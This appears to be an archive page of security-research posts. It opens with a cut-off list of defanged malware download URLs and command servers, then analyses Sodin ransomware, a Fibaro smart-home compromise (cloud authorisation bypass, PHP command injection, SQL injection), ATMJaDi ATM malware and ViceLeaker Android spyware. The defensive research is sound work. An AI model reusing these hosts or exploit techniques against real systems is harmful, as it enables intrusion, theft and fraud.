  • mol.com-ho[.]me/cv_itworx.doc
  • mci.com-ho[.]me/cv_mci.doc
  • jquerycode-download[.]live/flashplayer23pp_xa_install.exe
  • jquerycode-download[.]live/citrixcertificate.exe
  • jquerycode-download[.]live/chrome_update.exe
  • jquerycode-download[.]live/CitrixReceiver.exe
  • jquerycode-download[.]live/check.aspx
  • jquerycode-download[.]live/CheckLog.aspx
  • https://ntg-sa[.]com/downloads/citrix_certificate.exe
  • https://ntg-sa[.]com/Downloads/flashplayer23pp_xa_install.exe
  • https://ntg-sa[.]com/Downloads/Chrome_Update.exe
  • http://ntg-sa[.]com/cv.doc
  • http://ntg-sa[.]com/cv_itworx.doc
  • http://ntg-sa[.]com/cv_mci.doc
  • http://ntg-sa[.]com/discount_voucher_codes.xlsm
  • http://ntg-sa[.]com/Health_insurance_plan.doc
  • http://ntg-sa[.]com/Health_insurance_registration.doc
  • http://ntg-sa[.]com/job_titles.doc
  • http://ntg-sa[.]com/job_titles_itworx.doc
  • http://ntg-sa[.]com/job_titles_mci.doc
  • http://ntg-sa[.]com/Password_Policy.xlsm
  • http://itworx.com-ho[.]me/*
  • http://mci.com-ho[.]me/*
  • http://moh.com-ho[.]me/*
  • http://mol.com-ho[.]me/*
  • http://ntg-sa[.]com/*
  • taqa.com[.]sa/arabic/resumes/resume.doc
  • taqa.com[.]sa/arabic/resumes/resume.doc
  • taqa.com[.]sa/arabic/resumes/cv-taqa.doc
  • taqa.com[.]sa/arabic/images/certificate.crt.exe
  • taqa.com[.]sa/arabic/tempdn/cv-taqa.doc
  • 104.218.120[.]128/pro.bat
  • 104.218.120[.]128/msservice-a-2.exe
  • 104.218.120[.]128/msservice-a-4.exe
  • 104.218.120[.]128/check.aspx
  • 104.218.120[.]128:69/checkFile.aspx
  • 139.59.46[.]154/IMo8oosieVai
  • 139.59.46[.]154:3485/eiloShaegae1
  • 69.87.223[.]26/IMo8oosieVai
  • 69.87.223[.]26:8080/eiloShaegae1
  • 69.87.223[.]26:8080/p

Additional C2

  • analytics-google[.]org:69/check.aspx
  • analytics-google[.]org/checkFile.aspx
  • jquerycode-download[.]live/check.aspx
  • jquerycode-download[.]live/checkFile.aspx
  • go-microstf[.]com/checkFile.aspx
  • 104.218.120[.]128/check.aspx
  • 104.218.120[.]128:69/checkFile.aspx
2019. július 3.

Sodin ransomware exploits Windows vulnerability and processor architecture

When Sodin (also known as Sodinokibi and REvil) appeared in the first half of 2019, it immediately caught our attention for distributing itself through an Oracle Weblogic vulnerability and carrying out attacks on MSP providers. In a detailed analysis, we discovered that it also exploits the CVE-2018-8453 vulnerability to elevate privileges in Windows (rare among ransomware), and uses legitimate processor functions to circumvent security solutions.

According to our statistics, most victims were located in the Asia-Pacific region: Taiwan, Hong Kong, and South Korea.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographic spread of Sodin ransomware, April – June 2019

Technical description Vulnerability exploitation

To escalate privileges, Trojan-Ransom.Win32.Sodin uses a vulnerability in win32k.sys; attempts to exploit it were first detected by our proactive technologies (Automatic Exploit Prevention, AEP) in August last year. The vulnerability was assigned the number CVE-2018-8453. After the exploit is executed, the Trojan acquires the highest level of privileges.

Information about the process token after exploit execution

Exploit snippet for checking the window class

Depending on the processor architecture, one of two shellcode options contained in the Trojan body is run:

Procedure for selecting the appropriate shellcode option

Since the binary being analyzed is a 32-bit executable file, we are interested in how it manages to execute 64-bit code in its address space. The screenshot shows a shellcode snippet for executing 64-bit processor instructions:

Shellcode consisting of 32-bit and 64-bit instructions

In a 64-bit OS, the segment selector for 32-bit user mode code is 0x23, while the 64-bit segment selector is 0x33. This is confirmed by looking at the Global Descriptor Table (GDT) in the kernel debugger:

Part of the GDT in OS Windows 10 x64

The selector 0x23 points to the fourth segment descriptor (0x23 >> 3), and the selector 0x33 to the sixth (the null descriptor is not used). The Nl flag indicates that the segment uses 32-bit addressing, while the Lo flag specifies 64-bit. It is important that the base addresses of these segments are equal. At the time of shellcode execution, the selector 0x23 is located in the segment register cs, since the code is executed in a 32-bit address space. With this in mind, let’s take a look at the listing of the very start of the shellcode:

Saving the full address 0x23:0xC

After executing the command for RVA addresses 6 and 7, the long return address is stored at the top of the stack in the format selector:offset, and takes the form 0x23:0x0C. In the stack at offset 0x11, a DWORD is placed whose low-order word contains the selector 0x33 and whose high-order word encodes the instruction retf, the opcode of which is equal to 0xCB.

Saving the full address 0x33:0x1B to 64-bit code

Switching to 64-bit mode

The next instruction call (at the address RVA 0x16) performs a near intrasegment jump to this retf instruction (RVA 0x14), having sent the short return address (offset 0x1b) to the stack. As such, at the time of execution of the retf instruction, the top of the stack contains the address in the format selector:offset, where the selector equals 0x33 and the offset is 0x1b. After executing the retf command, the processor proceeds to execute the code at this address, but now in 64-bit mode.

64-bit shellcode

The return to 32-bit mode is performed at the very end of the shellcode.

Returning to 32-bit mode

The retf command makes a far intrasegment jump to the address 0x23:0x0C (it was placed in the instruction stack at the very start of the shellcode, at the RVA address 6-7). This technique of executing 64-bit code in a 32-bit process address space is called Heaven’s Gate, and was first described around ten years ago.

Trojan configuration

Stored in encrypted form in the body of each Sodin sample is a configuration block containing the settings and data required for the Trojan to work.

Decrypted Trojan configuration block

The Sodin configuration has the following fields:

Field Purpose pk distributor public key pid probably distributor id sub probably campaign id dbg debug build fast fast encryption mode (maximum 0x100000 bytes) wipe deletion of certain files and overwriting of their content with random bytes wfld names of directories in which the Trojan deletes files wht names of directories and files, and list of extensions not to be encrypted prc names of processes to be terminated dmn server addresses for sending statistics net sending infection statistics nbody ransom note template nname ransom note file name template exp use of exploit for privilege escalation img text for desktop wallpaper Cryptographic scheme

Sodin uses a hybrid scheme to encrypt victim files. The file contents are encrypted with the Salsa20 symmetric stream algorithm, and the keys for it with an elliptic curve asymmetric algorithm. Let’s take a closer look at the scheme.

Since some data is stored in the registry, this article uses the names given by the ransomware itself. For entities not in the registry, we use invented names.

Data saved by the Trojan in the registry

Key generation

The Sodin configuration block contains the pk field, which is saved in the registry under the name sub_key – this is the 32-byte public key of the Trojan distributor. The key is a point on the Curve25519 elliptic curve.

When launched, the Trojan generates a new pair of elliptic curve session keys; the public key of this pair is saved in the registry under the name pk_key, while the private key is encrypted using the ECIES algorithm with the sub_key key and stored in the registry under the name sk_key. The ECIES implementation in this case includes the Curve25519 elliptic curve, the SHA3-256 cryptographic hash, and the AES-256 block cipher in CFB mode. Other ECIES implementations have been encountered in Trojans before, for example, in SynAck targeted ransomware.

Curiously, the same private session key is also encrypted with another public key hardcoded into the body of the Trojan, regardless of the configuration. We will call it the public skeleton key. The encryption result is stored in the registry under the name 0_key. It turns out that someone who knows the private key corresponding to the public skeleton key is able to decrypt the victim’s files, even without the private key for sub_key. It seems like the Trojan developers built a loophole into the algorithm allowing them to decrypt files behind the distributors’ back.

Snippet of the procedure that generates key data and stores some of it in the registry

File encryption

During encryption of each file, a new pair of elliptic curve asymmetric keys is generated, which we will call file_pub and file_priv. Next, SHA3-256(ECDH(file_priv, pk_key)) is calculated, and the result is used as the symmetric key for encrypting file contents with the Salsa20 algorithm. The following information is also saved in the encrypted file:

Data stored in each encrypted file

In addition to the fields discussed above, there is also a nonce (random initialization 8 bytes for the Salsa20 cipher), file_pub_crc32 (checksum for file_pub), flag_fast (if set, only part of the data in the file is encrypted), zero_encr_by_salsa (null dword encrypted by the same Salsa20 key as the file contents – seemingly to check the correctness of the decryption).

The encrypted files receive a new arbitrary extension (the same for each infection case), the ransom note is saved next to them, and the malware-generated wallpaper is set on the desktop.

Cybercriminals demands

Fragment of the desktop wallpaper created by the ransomware

Network communication

If the corresponding flag is set in the configuration block, the Trojan sends information about the infected machine to its servers. The transmitted data is also encrypted with the ECIES algorithm using yet another hardcoded public key.

Part of the Sodin configuration responsible for network communication

Field Purpose ver Trojan version pid probably distributor id sub probably campaign id pk distributor public key uid infection id sk sk_key value (see description above) unm infected system username net machine name grp machine domain/workgroup lng system language bro whether language or layout is from the list (below) os OS version bit architecture dsk information about system drives ext extension of encrypted files

During the execution process, the Trojan checks the system language and available keyboard layouts:

If matches are detected in the list, the malware process terminates short of sending statistics.

MITRE ATT&CK techniques


More information about Kaspersky cybersecurity services can be found here: https://www.kaspersky.com/enterprise-security/cybersecurity-services




2019. július 1.

How we hacked our colleague’s smart home

In this article, we publish the results of our study of the Fibaro Home Center smart home. We identified vulnerabilities in Fibaro Home Center 2 and Fibaro Home Center Lite version 4.540, as well as vulnerabilities in the online API.

An offer you cannot refuse

The backbone of any technology company is made up of tech enthusiasts – people who eat, sleep, and breathe it, whose passion for experimenting, including on personal devices, leads them to interesting results. The idea for this study was suggested to us by a colleague of ours, a system administrator in the past and now vice-president of the company. Fibaro Home Center was installed at his home, and he kindly gave us permission to dissect it.

Fibaro is a rather unique company in some ways. It started operating in 2010, when IoT devices were not yet widespread. Today, the situation is different. According to IDC, in just a few years the number of IoT devices will hit almost one billion. Fibaro Group’s plant in Poland already makes about one million different devices a year – from smart sockets, lamps, motion sensors, and flood sensors to devices that directly or indirectly influence the security of homes fitted with them. Moreover, sales of Fibaro devices for 2018 in Russia grew by almost 10 times against 2017. The company clearly plays a significant role in the IoT device market, so a study of Fibaro smart home security is very timely indeed. And when our colleague offered his home as a guinea pig, we could hardly say no.

It is our hope that this article will attract more researchers to the world of IoT, since the growing army of IoT devices requires ever more resources to analyze them. We also hope that the results of our research will catch the eye of companies that produce IoT devices, since errors like the ones we found are best addressed at the code audit and device testing stages.

The challenge we thus faced was to attack the system of someone we knew. On the one hand, this simplified the task, because we did not have to prepare a test bed (the system includes a fairly wide range of different devices). Yet on the other, it complicated it, because the host knew about the impending attack, and had every opportunity to secure his home against the “intruders.”

Potential attack vectors

Before examining the vulnerabilities detected, we will describe our analysis of the attack surface of the Fibaro smart home and consider each of the attack vectors.

Reconnaissance stage

Just like real cybercriminals, we started with a little intelligence and information gathering from open sources.

Smart home equipment is rather expensive, but there is no need to own a specific device to get the required information about it, since Fibaro publishes extensive details of its devices online. The FAQ section on the company’s website provides some interesting facts. For example, Home Center can be managed directly from home.fibaro.com or even via SMS. So clearly, when Internet access is available, the system connects to, and can be controlled through, the cloud.

The website also divulges that Home Center manages Fibaro devices using the Z-Wave protocol. This protocol is often used to automate home processes, as it has greater range than Bluetooth and lower power consumption than Wi-Fi.

Another tidbit is that if the network already has some kind of smart device that does not belong to Fibaro (for example, an IP camera), Fibaro provides various plug-ins to integrate the device into a single complex and manage it from Home Center.

Our colleague greatly simplified our task by providing a static IP address through wLibraryhich we could gain access to the admin panel login form.

Admin panel login form

A scan revealed that only one port accessible from the outside was opened at this IP address and it was forwarded on the router to the Fibaro Home Center admin panel. All other ports were blocked. The presence of an open port goes against Fibaro’s security recommendations (see item 10). However, if our colleague had used a VPN to access Home Center, the lack of any entry points to start analysis would have put an end to our study before it had begun.

Perimeter overview

At the reconnaissance stage, information from open sources (more precisely, from Fibaro’s official website) was sufficient to piece together several attack vectors that could be used against our colleague’s home.

Attack via Z-Wave

This attack can be carried out in the immediate vicinity of the device. The intruders need to reverse-engineer the code of the Z-Wave communication module, for which they need to be within range of a device operating on the Z-Wave protocol. We did not go down this route.

Attack via the admin panel web interface

As is known, the smart home system has an admin panel for device management. This means that there is some kind of backend and data storage on the device in question. Most often, due to the lack of RAM and persistent memory in embedded and IoT devices, the server role is performed by PHP or CGI (which run alongside a lightweight web server), while the file system or file database (for example, SQLite) acts as the storage. Sometimes, the server-side logic is wholly processed by a web server, which takes the form of a compiled binary ELF file. In our case, the software stack consisted of PHP, Lua, nginx, a C++ server, and lighttpd, while data was stored in both an SQLite database and a special section of the file system.

The fact that the admin panel operates through an API written in PHP encouraged us to continue this line of enquiry. To investigate the admin panel for vulnerabilities using white-box testing at this stage, we had to get the admin panel source code and the firmware of the smart home itself. This would provide a clearer understanding of its architecture and the structure of the logical processes inside it, such as scanning and downloading/installing updates.

Attack via the cloud

This type of attack can be carried out in two ways:

  1. By attempting to gain access to a device via the cloud having already access to similar Fibaro device,
  2. By attempting to gain access to the cloud, without access to any Fibaro device.

This vector implies testing the software logic, which is often located on the vendor’s servers. As we found out at the reconnaissance stage, Home Center can be managed through home.fibaro.com, a mobile app, or SMS. Even if you do not have a static IP address, your device will be accessible from the Internet. This means that the device connects to a server (most likely the vendor’s), which can allow the attacker to gain access to another smart home through the vendor’s common network.

The differences between (a) and (b) will become apparent when we examine the device architecture in more detail.  At this stage, suffice it to know that we need to somehow collect data about what common functionality the devices have in terms of the cloud.

File system image analysis

Let’s skip the description of how we found the image of the file system for the required device (we describe different ways of getting device firmware with examples as part of our IoT/embedded device vulnerability search training).

Our examination of the file system turned up some interesting facts.


The web server has a fully documented API that describes methods, parameter names, and the values they can take in a request. However, it turned out that to get any significant information, it was necessary to log into the admin panel.

The only information that can be obtained without authorization is the device serial number.

Access to the documented API through the web interface

Also, it can be seen in the nginx web server configuration file that some requests are proxied to a local server written in C++, and some are proxied to lighttpd, which executes code in PHP using mod_cgi. These PHP request handlers are called “services”

Simplified nginx server configuration


As already stated, the majority of API requests are handled by a C++ binary server. However, for unexplained reasons, the developers singled out part of the logic (rebooting the device, restoring factory settings, creating a backup copy, and much more) and wrote it in PHP.

The web server written in C++ accepts all requests from nginx, and we have no direct access to it. This significantly narrows the attack surface for this web server – we have no option to send a randomly generated HTTP request to it.

Therefore, the part of the logic written in PHP is of great interest to us, since it is just about the only entry point for a possible attack.

Serial number and hardware key

Each device has a serial number and a hardware key, which are used to authorize it in the cloud. Each time a device wants to perform an action that is somehow connected to the cloud (for example, send an SMS or email to the device owner, upload a backup copy to the cloud, download a backup copy), the device sends an HTTP request to the server with the serial number and hardware key as parameters. These are checked in the cloud for compliance in the database. If authorization is successful, the action is executed.

As we already know, the serial number is not secret: It is fairly easy to get by means of an API request. Moreover, the number is not long. The serial numbers we encountered correspond to the regular expression (HCL|HC2)-(\d{6}), which is a small enough space to brute-force.

The hardware key, meanwhile, is secret and individual for each device; it is stored in a special section of the file system that is mounted during device bootup.

However, only the device serial number is used for scanning and checking for updates. This makes it quite straightforward to download any update from the cloud by serial number.

Threat of hardware key theft

A device that stores personal user data must be made as secure as possible against intrusion. To increase the level of protection, device developers sometimes deprive the owner of superuser rights in the system. In this case, the owner becomes an ordinary, non-privileged user able to perform only actions allowed by the developers. Sometimes, however, this approach does not work, because if the owner wants to tweak or fix something in the device (for example, a vulnerability in the phone’s code), they will not be able to do it independently. They will need assistance from the device developers, who can release an update with a fix, but not as quickly as one would like. Therefore, an alternative approach involves developers giving owners superuser rights, together with the responsibility for their use.

Both approaches have their strengths and weaknesses, and the question of which is better is a good topic for debate, but not today.

Fibaro’s developers decided not to give Home Center owners superuser rights and extra responsibility. Therefore, we viewed options to elevate privileges in the system from the admin panel as full-fledged vulnerabilities.

In the threat model we built for Fibaro Home Center, the priority is to protect the hardware key. The device has a function for sending notifications to the smart home owner in the event that their participation is needed to resolve issues reported by smart home equipment. Any hardware key owner can send messages, and the list of recipients who the owner of a particular hardware key can contact is not controlled in any way.

Messages from the cloud come from the address SERIAL_NUMBER@fibaro.com, where SERIAL_NUMBER is the serial number of the owner’s device. It can be assumed that not all device owners remember their Home Center serial number, and are not vigilant enough to check it. They are likely not to notice the substitution of the serial number in the sender’s address; the fact that the message was sent from the @fibaro.com server will be enough. And they will perform the actions recommended in the message.

Since the problem of extracting the hardware key from the device’s persistent memory is in most cases a question of time, it might be an idea for developers to change the mechanism for sending messages and SMS.


In the Fibaro Home Center admin panel, it is possible to create “scenes” – behavior scenarios composed of blocks or scripts written in the Lua programming language that are executed under specified conditions.

Lua provides the option to create an isolated environment in which the programmer can execute arbitrary scripts in Lua without going beyond it. The language is also known for having various vulnerabilities that make it possible to escape from this isolated environment. A good example is a recently discovered vulnerability in Lua 5.0.3 in the bytecode verifier module, which formed the basis of a CTF challenge. In the description, the author states that the vulnerability was originally exploited on a “VPN SSL device” that that they were investigating as part of their work.

Unfortunately, we were out of luck: On the device that we examined, a newer version (5.2) of the Lua interpreter without the bytecode verifier module was installed, and none of the known simple methods of escaping from the Lua sandbox was available. In our case, the task of finding vulnerabilities in the isolated environment was reduced to searching for vulnerabilities directly in the Lua interpreter. This task is quite time-consuming, so we decided it would be irrational to pursue this vector.

Lua isolated environment


Many plug-ins for Fibaro Home Center can be used to manage devices that may not belong to Fibaro. This feature adds a very interesting research vector: Can a cybercriminal with access to a device controlled by Home Center through plug-ins attack Home Center and gain access to it? Within the framework of this study, we decided to postpone work on this vector and focus instead on vulnerabilities more likely to bear fruit.

Cloud communication

To communicate with the cloud, the device performs several steps:

  • It gets the IP address and port to which it should connect,
  • It establishes an SSH connection with the server,
  • It forwards SSH port 22 to the specified port.

Thus, the Fibaro control center can connect to Home Center via a cloud server using a private SSH key to execute any command sent by the home owner, for example, by SMS or via the website.

Authentication nuances

An administrator password salt was not individually generated for each device, but strictly defined in the PHP code. If an attacker wanted to gain access to all Fibaro devices, their goal would be made a lot easier as a consequence. The cybercriminal could download all saved backup copies of all Fibaro smart home users, and then find identical hashes corresponding to identical passwords. The most common password matching the most frequently occurring hash could be brute-forced.

The scenario whereby an attacker builds rainbow tables for a given salt is possible in a targeted attack against all users of Fibaro systems. This is another argument in favor of generating an individual salt for each device.

Vulnerability scan

The first thing we looked at during our study was the part of the API implemented in PHP.

It would have been very interesting for us to test the methods that lay behind login, but without the ability to sign in, this research vector would not have yielded any results, since we could not call the methods we needed.

We investigated practically the only entry point available to us, and found nothing. It seemed that the study had reached a deadend, but then we decided to study the attack vector via the cloud.

Access to the cloud through which the smart home is managed (i.e. home.fibaro.com) was also unavailable to us, so we could only collect information about the cloud from scripts on the device that accessed it. As a rule, requests to the cloud were made from the device using the command-line tool cURL. Of all the requests, the most interesting were those for uploading backup copies to the cloud and downloading them from the cloud to the device.


After testing the cloud methods for processing requests from the device, we discovered a vulnerability linked to an authorization error allowing an intruder to list the backup copies of any user, upload backup copies to the cloud, and download them without having any rights in the system.

This problem occurred in the PHP code most likely as a result of incorrectly processing a scenario in which the passed value of the hardware key was set to null.

We rated this vulnerability as critical because it allowed access to all backup copies that were uploaded to the cloud from all Fibaro Home Centers. As will be shown later, using a backup copy and a remote code execution vulnerability in the admin panel, it is possible to gain full control over Home Center without interacting with the owner.

Remote code execution

Several remote code execution vulnerabilities were related to weak implicit typing in PHP. Let’s consider a simplified PHP code snippet in which we found a vulnerability:

Simplified PHP code snippet

On Fibaro devices, a significant part of device management is implemented using bash scripts, which in turn invoke command-line utilities for direct execution of required actions in the system. Some of these executable scripts are invoked directly from the PHP code using the exec command.  Since in the above snippet the user-controlled parameter is subsequently included in the command-line arguments, it needs to be filtered. If it is not possible to avoid executing bash scripts, the best solution is to not interpret this line in the bash shell and to run this command in an execve()-style way through the pcntl_exec function. However, due to the weak typing in PHP, and the fact that $_GET[‘parameter_name’] necessarily takes a string value, this parameter can be equal to 1234some_data_here_or_may_be_code_injection, in which case it will pass the if($parameter_value>0) check. Thus, the exploitation of this vulnerability made it possible to execute code remotely from the admin panel and gain root access on the device.

SQL injection

We also detected several problems associated with the injection of SQL code.

With the development of smart home software, the introduction of new components and dependencies is inevitable. Yet at the same time, they have to be accommodated in memory of very limited size. As a result, developers have to question the need for each new file in the system so as to avoid unnecessary future outlays on having a larger memory for each device. Therefore, developers of embedded devices often try to reduce, as far possible, the number of executable files and libraries that get installed onto the device. This is probably why Home Center did not have a library for interaction between SQLite and PHP, which could eliminate SQL injection by design errors with the help of prepared statements.

Simplified code sample containing an error

As can be seen in the screenshot, the system developers wanted to avoid SQL injections through the use of a very interesting filtration technique involving the duplication of quotes in the query, and a no less unusual method of accessing the database by running the sqlite3 tool from the command line. However, such filtering turned out to be insufficient because the quotes can still be escaped using a backslash in the first parameter. If such a backslash is inserted, it leads to a breakout from the string context in the second parameter and potential SQL injection in the database query.

In versions older than 4.540, all database queries were modified and securely rewritten using prepared statements.

The “Attack”

Using the vulnerability identified, we managed to retrieve a backup copy from our colleague’s device, in which only one file was of interest to us: the SQLite database file. A careful examination of this file showed it to contain a lot of valuable information:

  1. Our colleague’s password in cached form with an added salt
  2. The precise coordinates of the home where the device was located
  3. The geolocation of our colleague’s smartphone
  4. Our colleague’s email addresses used for registration in the Fibaro system
  5. All data about IoT devices (including ones not belonging to Fibaro) that were installed by our colleague at home, with device model, username/password in text form, IP addresses of devices in the internal network, etc.

Note that storing passwords for Fibaro Home Center-integrated IoT devices in text form allows an attacker with access to the Home Center and the SQLite database to gain access to all other devices in the home.

An offline attempt to brute-force our colleague’s password led nowhere, and none of the passwords for the other devices in the home worked for the Home Center control panel. However, we would have been very surprised if such a simple attack had produced a result. As a company, we regularly emphasize the need to use strong unique passwords for each device or service.

If we could have recovered the password from the hash using brute force, or if one of the passwords for the other devices had worked, we could have got inside the Home Center control panel. Then, to elevate privileges in the system, we would have needed to exploit the remote code execution vulnerability described above. To gain access to the device in this case, the owner’s participation would not have been required. But we had to take a different route.

We created a special backup copy in which we placed a password-protected PHP script that could execute any our command. After that, using the relevant cloud functionality, we sent an email and an SMS to our colleague for him to update the software on the device by downloading from the cloud the backup copy that we had prepared.

Our colleague knew straight away that these messages were sent by us. First, he had been expecting an “attack,” and second, our email did not match the standard format used by Fibaro. However, an ordinary user unaware that their smart home is being hacked might not spot the difference in format. As such, our colleague decided to continue the experiment and installed the backup copy.

The web server for executing PHP scripts was run on the device with superuser rights. So after the backup copy was installed by the device owner, we gained access to the smart home with maximum privileges.

Naturally, being decent and responsible people, we did not take any harmful actions in our colleague’s home – with the exception of changing the melody on his alarm clock to indicate our presence. The following morning, our colleague awoke to the soothing tones of drum & bass.

But unlike us, a real attacker with access to Home Center is unlikely to just fool around with the alarm clock. One of the main tasks of the device we investigated is to integrate all smart things so that the home owner could manage them from Home Center itself. A “smart thing” here can be not just a light bulb or kettle, but vital safety equipment: for example, alarms, window/door/gate opening and closing mechanisms, surveillance cameras, heating/air conditioning systems, etc. The havoc a villain could wreak in this situation is the stuff of horror movies, not this article.


In the course of this study, we were able to gain potential access through the cloud to all Fibaro Home Centers by uploading and downloading backup copies, as well as full root access to our colleague’s smart home.

We uncovered critical vulnerabilities on the device itself and in the cloud service. Our findings were reported to Fibaro Group, after which all the vulnerabilities were successfully eliminated.

We wish to thank Fibaro Group for this successful cooperation, and hope that we have helped to improve the security of their flagship product.

Currently, smart home nightmares are confined to horror movie screenplays, but they could soon become a terrifying reality if we do not take sufficient care over what we make and use.




2019. június 27.

Criminals, ATMs and a cup of coffee

In spring 2019, we discovered a new ATM malware sample written in Java that was uploaded to a multiscanner service from Mexico and later from Colombia. After a brief analysis, it became clear that the malware, which we call ATMJaDi, can cash out ATMs. However, it doesn’t use the standard XFS, JXFS or CSC libraries. Instead, it uses the victim bank’s ATM software Java proprietary classes: meaning the malware will only work on a small subset of ATMs. It makes this malware very targeted.

Kaspersky products detect the sample as Trojan.Java.Agent.rs

Technical Details

First, as with most other ATM malware, the attackers must find a way to install the malware on the target ATMs. The malware can’t be controlled via the ATM keyboard or touchscreen, because it runs a self-crafted HTTP server web interface for its purpose. So the criminals must have network access to the target ATM. This makes us believe that the criminals have compromised the bank’s infrastructure to gain access to the network that the ATMs are connected to.

Once installed and executed, the malware, in the form of a Java archive file called “INJX_PURE.jar”, looks for the process that controls the ATM and injects itself into it, giving it control of the legitimate ATM process. After injection, the malware prints a message on the terminal simultaneously in several languages: Russian, Portuguese, Spanish and Chinese. However, all the other messages or strings used by the malware are in English. The different language phrases shown in the output can be translated into English as “Freedom and glory”. This is followed by the additional Russian message “отдельный”, which means “separate”. We believe this might be a false flag, because native Russian speakers would never use this word in this context.

  • Свобода и слава
  • Liberdade e glória
  • Libertad y gloria
  • 自由与荣耀
  • отдельный

Next, an HTTP server is started that accepts commands using predefined URL paths. They are:

  • /d to dispense or to get the ATM cassette to carry out actions (the proper action is determined by the passed parameters);
  • /eva to evaluate (run) user-supplied code on the victim ATM;
  • /mgr for the manager, which gives criminals access to a list of all running classes for the attached Java virtual machine, so that they can call any function they desire, supplying the arguments if needed;
  • /core allows the criminals to load a specified .jar file from the victim file system;
  • /root path accepts a POST request body and passes it as a shell command to cmd.exe, returning the resulting output.

The dispensing and “run a shell” path do not have an interface page with forms and buttons, but instead only accept pre-prepared HTTP POST requests and print the raw text results to a page, omitting HTML tags. So, in the case of the dispensing request, the malware response will be the ‘ok’ string. The “get cash units information” request will be followed by a string describing the ATMs cash units status (see the example below).


This string consists of four groups, each group separated with a semicolon. It is a list that corresponds to the ATM cash cassette and consists of two values, separated by a colon: the denomination and the actual number of bills in the cassette. In the example above, the first cassette has 1000 banknotes of denomination 1, 700 banknotes of denomination 5, etc.

Other than the “run a shell”, “dispense” and “get cash unit”, the “eva”, “mgr” and “core” paths have interface pages. Below is a screenshot of the evaluation page:

/eva path interface example screenshot

It allows the criminals to paste and run any JavaScript code on a victim ATM and see what it returns. Why JavaScript? Because Java allows the use of external engines, and the criminals used a JavaScript one. Below is the function that the malware uses to run the passed JavaScript code.

Malware sample code that can evaluate JavaScript


The targeted nature of ATMJaDi shows that the criminals studied the victim very well before writing their malware. It’s clear that they must have had access to an ATM where the custom Java classes were running and most likely to the Java program source code as well.

Also, the way the malware can be controlled shows that the criminals planned to gain network access to the infected ATM, most likely through the bank’s internal network.

What banks can do to prevent these types of attacks:

  • Set up special anti-targeted attack solutions such as KATA (Kaspersky Anti Targeted Attack Platform) to protect the bank’s network and other solutions to protect ATMs from malware;
  • ATM file whitelisting;
  • The bank ATM network has to be isolated and access to it must be highly restricted;

This is not a complete list of actions: the issue of information security requires constant attention and action.

2019. június 26.

ViceLeaker Operation: mobile espionage targeting Middle East

In May 2018, we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens. Kaspersky Lab spyware sensors caught the signal of an attack from the device of one of the victims; and a hash of the APK involved (Android application) was tagged in our sample feed for inspection. Once we looked into the file, we quickly found out that the inner-workings of the APK included a malicious payload, embedded in the original code of the application. This was an original spyware program, designed to exfiltrate almost all accessible information.

Spyware sensors samples feed contained the first sample

During the course of our research, we noticed that we were not the only ones to have found the operation. Researchers from Bitdefender also released an analysis of one of the samples in a blogpost. Although something had already been published, we decided to do something different with the data we acquired. The following month, we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples. We decided to call the operation “ViceLeaker”, because of strings and variables in its code.

Mobile ViceLeaker

The following table shows meta information on the observed samples, including compiler timestamps:

MD5 Package Compiler C2 51df2597faa3fce38a4c5ae024f97b1c com.xapps.SexGameForAdults dexlib 2.x 188.165.28[.]251 2d108ff3a735dea1d1fdfa430f37fab2 com.psiphon3 dexlib 2.x 188.165.49[.]205 7ed754a802f0b6a1740a99683173db73 com.psiphon3 dexlib 2.x 188.165.49[.]205 3b89e5cd49c05ce6dc681589e6c368d9 ir.abed.dastan dexlib 2.x 185.141.60[.]213

To backdoor legitimate applications, attackers used a Smali injection technique – a type of injection that allows attackers to disassemble the code of original app with the Baksmali tool, add their malicious code, and assemble it with Smali. As a result, due to such an unusual compilation process, there were signs in the dex file that point to dexlib, a library used by the Smali tool to assemble dex files.

Original code of the APK on the left, versus injected APK on the right

The analysis of the APK was rather interesting, because some of the actions were very common spyware features, such as the exfiltration of SMS messages, call logs and other data. However, in addition to the traditional functionality, there were also backdoor capabilities such as upload, download, delete files, camera takeover and record surrounding audio.

The malware uses HTTP for communication with the C2 server for command handling and data exfiltration. Here is a command and control protocol fragment:

Commands from C2 server parsing

In total, the malicious APK handles 16 different commands:

Command Endpoint Description 1 reqsmscal.php Send specified SMS message 2 reqsmscal.php Call specified number 3 reqsmscal.php Exfiltrate device info, such as phone model and OS version 4 reqsmscal.php Exfiltrate a list of all installed applications 5 reqsmscal.php Exfiltrate default browser history (limited to a given date) 6 reqsmscal.php Exfiltrate Chrome browser history (limited to a given date) 7 reqsmscal.php Exfiltrate memory card file structure 8 reqsmscal.php Record surrounding sound for 80 seconds 1 reqcalllog.php Exfiltrate all call logs 2 reqcalllog.php Exfiltrate all SMS messages 3 reqcalllog.php Upload specified file from the device to the C2 4 reqcalllog.php Download file from specified URL and save on device 5 reqcalllog.php Delete specified file 6,7,8 reqcalllog.php Commands not yet implemented 9 reqcalllog.php Take photo (muted audio) with rear camera, send to C2 10 reqcalllog.php Take photo (muted audio) with front camera, send to C2

All observed samples with Smali injections were signed by the same debug certificate (0x936eacbe07f201df).

As we know from our investigation, traces of the first development activities were found at the end of 2016, but the main distribution campaign began in 2018 (end of 2017).

Based on our detection statistics, the main infection vector is the spread of Trojanized applications directly to victims via Telegram and WhatsApp messengers. There are the following relevant detection paths (the last one is an alternative Telegram client – “Telegram X“):

Name Detection path Sex Game For Adults 18.apk /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/ 4_6032967490689041387.apk /storage/emulated/0/Telegram/Telegram Documents/ Psiphon-v91.apk /storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/ Backdoored Open Source

During the course of our analysis, we also found samples sharing code with the ViceLeaker malware, in particular they shared a delimiter that was used in both cases to parse commands from the C2 server.

Modified Conversations (on the right) code overlap with the Smali injections (left)

This would be a very unusual coincidence. Even when a false flag might also be a possibility, we consider this to be unlikely.

The samples sharing this overlap are modified versions of an open source Jabber/XMPP client called “Conversations” with some code additions. The legitimate version of this app is also available on Google Play.

Screenshot of Conversations app on Google Play

